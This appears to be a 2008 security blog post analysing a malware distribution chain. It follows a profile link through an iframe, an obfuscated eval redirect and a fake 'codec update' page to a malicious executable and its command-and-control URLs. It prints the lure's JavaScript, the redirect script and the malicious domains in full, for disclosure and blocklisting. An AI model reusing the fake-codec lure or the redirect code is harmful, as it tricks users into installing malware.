Blog for hpHosts, and whatever else I feel like writing about ....

Wednesday 24 September 2008

Mylot.com codec infection madness!

Public profiles are a great way to tell people about yourself, just look at the hundreds of sites that offer such a feature. These features however, can be just as bad for the visitor. Take the following for example;



This profile, contains a lovely little link that takes you to;

http://superelectionpolls.info/Teens_Video.html

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://superelectionpolls.info/Teens_Video.html
Server IP: 206.53.51.84 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 1
via Proxy: TeMerc Internet Countermeasures (US)
Date: 25 September 2008
Time: 03:48:08:48
*****************************************************************
<head>
<title> HOT VIDEO SENASTION ONLY HERE!!!</title>
<meta http-equiv="Content-Language" content="en-us" >
<meta name="robots" content="index, follow" >
<META NAME="Keywords" CONTENT="full on bush,george bush on obama"/>
<meta name="description" content="full on bush, nunn bush penny loafer, zshare jennifer bush, full on bush, bush ak20 television user manual, bush iraq troop reduction/">
<meta name="revisit-after" content="2 days">
<meta name="rating" content="general">
</head>
<p><IFRAME src="test.html" width="1200" height="1000"
scrolling="auto" frameborder="1">
</IFRAME>
</p>
<br>


As you can see, this loads an iFrame that then loads;

http://superelectionpolls.info/test.html

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://superelectionpolls.info/test.html
Server IP: 206.53.51.84 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 1
iFrames: 0
via Proxy: TeMerc Internet Countermeasures (US)
Date: 25 September 2008
Time: 03:48:47:48
*****************************************************************
<html>
<head>
<title>
fastguidan.info
</title>
</head>
<BODY bgcolor="FFFFCC">
<script type="text/javascript" language="javascript">
eval(unescape("myvar1%3D5462%3B%0D%0Amyvar4%3Dmyvar1%3B%0D%0Aif%28myvar1%3D%3Dmyvar4%29%20document%2Elocation%3D%22http%3A%2F%2Falldebt%2Ebiz%2Fnewway%2Fin%2Ecgi%3F5%22%3B%0D%0A"));
</script>

</body>

</html>


This then loads the following little script;

eval(unescape("myvar1=5462;
myvar4=myvar1;
if(myvar1==myvar4) document.location="http://alldebt.biz/newway/in.cgi?5";
"));


Which as you can see, takes you to;

http://alldebt.biz/newway/in.cgi?5

.... which is where the fun begins. alldebt.biz, uses a 302 redirect;

HTTP/1.1 302 Found
Date: Wed, 24 Sep 2008 22:27:29 GMT
Server: Apache/1.3.36 (Unix) mod_fastcgi/2.4.2 PHP/5.1.4 FrontPage/5.0.2.2510
Set-Cookie: SL_5_0000=_5_; domain=alldebt.biz; path=/; expires=Thu, 25-Sep-2008 22:27:29 GMT
Location: http://theprivatetube.com/1/0/0/693/0/white/
Transfer-Encoding: chunked
Content-Type: text/html


Which as you can see, takes us to theprivatetube.com, which loads;

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://alldebt.biz/newway/in.cgi?5
Server IP: 72.232.180.163 [ 163.180.232.72.static.reverse.ltdomains.com ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 5
iFrames: 0
via Proxy: TeMerc Internet Countermeasures (US)
Date: 25 September 2008
Time: 03:49:38:49
*****************************************************************
<html>
<head>
<title>Free movies online</title>
<style>
#alertMessage {
background: #000000 url(/error.png) no-repeat scroll 0pt;
height: 129px;
visibility: hidden;
width: 384px;
z-index: 2;
position: absolute;
}

body {
background-color: white;
font-family:Tahoma;
align:center;
}
</style>
<script>

function simpleRedirect()
{
document.getElementById("alertMessage").style.visibility = "hidden";
document.body.onbeforeunload="";
document.location = "/cd/693/0/wmcodec_update.exe";
document.body.onbeforeunload="askInstall();return false";
}

function openCodec()
{
document.body.onbeforeunload="";
document.location = "/cd/693/0/wmcodec_update.exe";
document.body.onbeforeunload="askInstall();return false";
}

function alertInstall()
{
alert("Windows Media Player Error\n"+"Please, click 'OK' for Upgrade Windows Media Player Codec Library.");
openCodec();
}

function askInstall()
{
if (confirm("Windows Media Player Error\n"+"Please, click 'OK' for Upgrade Windows Media Player Codec Library."))
simpleRedirect();
else
alertInstall();
}

function hideAlert()
{
document.getElementById("alertMessage").style.visibility="hidden";
simpleRedirect();
}

function docLoad()
{
document.body.onbeforeunload="askInstall();return false";
}
</script>
<script src="/dnd.js"></script>
</head>
<body>
<div style="font:17px Tahoma;color:black;" align="center">

</div>
<div id="alertMessage" onmousedown="this.style.zIndex=10;StartDrag(event,this,PutBack)" name="errorMsg">
<div id="alertTitle"
style="position: relative; top: -14px; left: 360px; width: 20px; height: 20px; font-size: 14px; color: white; font-weight: bold; border: none"
onclick="hideAlert();">
<div style="display: none"> </div>
</div>
<div id="alertText"
style="position: relative; top: 20px; left: 60px; width: 300; font-size: 12px; font-name: Arial">
Windows Media Player cannot play the file. The Player does not support the format you are trying to play. Please install video codec update.</div>
<div id="alertButtons"
style="position: relative; top: 30px; left: 100px" /><input
type="button" onclick="simpleRedirect()"
value="  Ok  " /> <input type="button"
onclick="simpleRedirect();" value="  Cancel  " />
<input type="button" onclick="simpleRedirect()"
value="  Continue  " /></div>
</div>

<table width="100%" align="center" valign="center" cellpadding="0" cellspacing="0">
<tr>
<td align="center" valign="center"><img src="/img/prev_1_0.png"
onclick="simpleRedirect();" style="border: 1px solid white" /></td>
</tr>
</table>
<script>
<!--
setTimeout("showAlert();", 1000);

function showAlert()
{
var p=document.getElementById("alertMessage");
wmpwidth=document.body.clientWidth/2-190;
wmpheight=document.body.clientHeight/2-145;
p.style.top = wmpheight;
p.style.left = wmpwidth;
p.style.visibility = "visible";
p.focus();
}
-->

</script>
</body>
</html>


This then loads a 187K executable;

http://theprivatetube.com/cd/693/0/wmcodec_update.exe

Which Avira kindly flagged for me .........



VT results for wmcodec_update.exe;

http://www.virustotal.com/analisis/fb970f590465d2da92b161aac1706893

Extraction of the executable failed whilst named .exe, so I tried renaming it to .zip (Universal Extractor identified it as a 7-zip file), and voila - I could extract it. The following is it's contents;


*****************************************************
Ur I.T. Mate Group Intranet
http://mysteryfcm.co.uk

This file has been generated by QFScript v1.0 Revision 3
Author: Steven Burn - Ur I.T. Mate Group owner
Homepage: www.it-mate.co.uk

File index for: mylot_com\alldebt_biz_-_theprivatetube_com
*****************************************************
DATE/TIME - MD5 - FILE/FOLDER
25/09/2008 04:03:30     d96fa963dbabb94bb60fc38ded67cc7f     alldebt_biz_-_theprivatetube_com
25/09/2008 04:04:20     21a7031dde9bdb27f07f5fcfa58bd905     alldebt_biz_-_theprivatetube_com\wmcodec_update.exe
25/09/2008 04:14:06     89f3c6308bce5f634dfc374499b3a1a9     alldebt_biz_-_theprivatetube_com\wmcodec_update
25/09/2008 04:14:10     825f37247eaef9006448dc5d0265aa29     alldebt_biz_-_theprivatetube_com\wmcodec_update\$R0
25/09/2008 04:16:16     4119d31ea7da45cf0d9a6f9961918038     alldebt_biz_-_theprivatetube_com\wmcodec_update\script.bin
25/09/2008 04:16:20     8cfcf8ed20ed00fd6f80eabc6a8b321a     alldebt_biz_-_theprivatetube_com\wmcodec_update\ýŠ€
25/09/2008 04:16:20     307f3492345535f4d6d5ce2637c8341b     alldebt_biz_-_theprivatetube_com\wmcodec_update\ProgramFilesDir
25/09/2008 04:16:20     8cfcf8ed20ed00fd6f80eabc6a8b321a     alldebt_biz_-_theprivatetube_com\wmcodec_update\ProgramFilesDir\ýŠ€
25/09/2008 04:16:20     5680520d33b4175681abf3138a5ecfd6     alldebt_biz_-_theprivatetube_com\wmcodec_update\ProgramFilesDir\sx2_77000560.exe
25/09/2008 04:16:20     173ffeaf2e189bc76e476b255559b41a     alldebt_biz_-_theprivatetube_com\wmcodec_update\$PLUGINSDIR
25/09/2008 04:16:20     8183cd31665faaf5a7d7f5fa4d54e57b     alldebt_biz_-_theprivatetube_com\wmcodec_update\$PLUGINSDIR\System.dll
*****************************************************
3 folders, 7 files
*****************************************************


Sadly, detection for sx2_77000560.exe is rather pitiful, with only 2/36 actually detecting it;

http://www.virustotal.com/analisis/4df5fd8178baf3f313854d2839309eb5

The ýŠ€ and $R0 are all 0 byte files ........ Sadly, Universal Extractor, whilst again, identifying sx2_77000560.exe as a 7-zip file, could not actually extract it.

Looking through the wmcodec_update.exe executable shows some interesting content too. For example, it contains the following URL references;

http://meta38.com/service/index.php
http://linker15.cn/service/index.php



Both URL's return the same content;

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://meta38.com/service/index.php
Server IP: 200.63.45.51 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 0
via Proxy: TeMerc Internet Countermeasures (US)
Date: 25 September 2008
Time: 04:29:43:29
*****************************************************************
<root>
<serviceurls>
<serviceurl>http://meta38.com/service/index.php</serviceurl>
<serviceurl>http://linker15.cn/service/index.php</serviceurl>
</serviceurls>
<feedurls>
<feedurl>http://bestsearch3.com/feed/get.php</feedurl>
<feedurl>http://bestsearch4.com/feed/get.php</feedurl>
</feedurls>
</root>


bestsearch3.com and bestsearch4.com, both failed to return anything useful.

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://bestsearch3.com/feed/get.php
Server IP: 200.63.45.51 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 0
via Proxy: TeMerc Internet Countermeasures (US)
Date: 25 September 2008
Time: 04:33:04:33
*****************************************************************
<?xml version="1.0" encoding="UTF-8" ?>
<result>
</result>

No comments: